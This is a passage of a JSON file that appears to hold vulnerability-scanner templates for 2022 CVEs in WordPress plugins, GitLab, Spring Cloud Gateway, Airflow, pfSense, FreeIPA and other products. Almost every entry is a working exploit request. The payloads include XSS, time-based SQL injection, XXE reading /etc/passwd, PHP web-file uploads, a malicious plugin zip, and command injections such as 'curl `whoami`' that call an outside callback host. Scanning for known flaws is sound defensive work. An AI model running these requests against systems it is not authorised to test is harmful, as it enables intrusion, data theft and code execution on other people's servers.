Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-25568","info":{"name":"MotionEye Config Info Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["upload_password","network_password"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-4305","info":{"name":"Login as User or Customer < 3.3 - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1\nHost: {{Hostname}}\nCookie: loginas_old_user_id=1\n","GET /wp-admin/users.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')"],"condition":"and"}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-44291","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","len(body_2) == 0","status_code_2 == 302","contains(header_2, \"text/html\")","contains(body_1, \"webTareasSID\")"],"condition":"and"}]}]},{"id":"CVE-2022-45365","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Stock Ticker Fatal","<IMG SRC=X ONERROR="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44290","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'Delete the following?')"],"condition":"and"}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-0666","info":{"name":"Microweber < 1.2.11 - CRLF Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 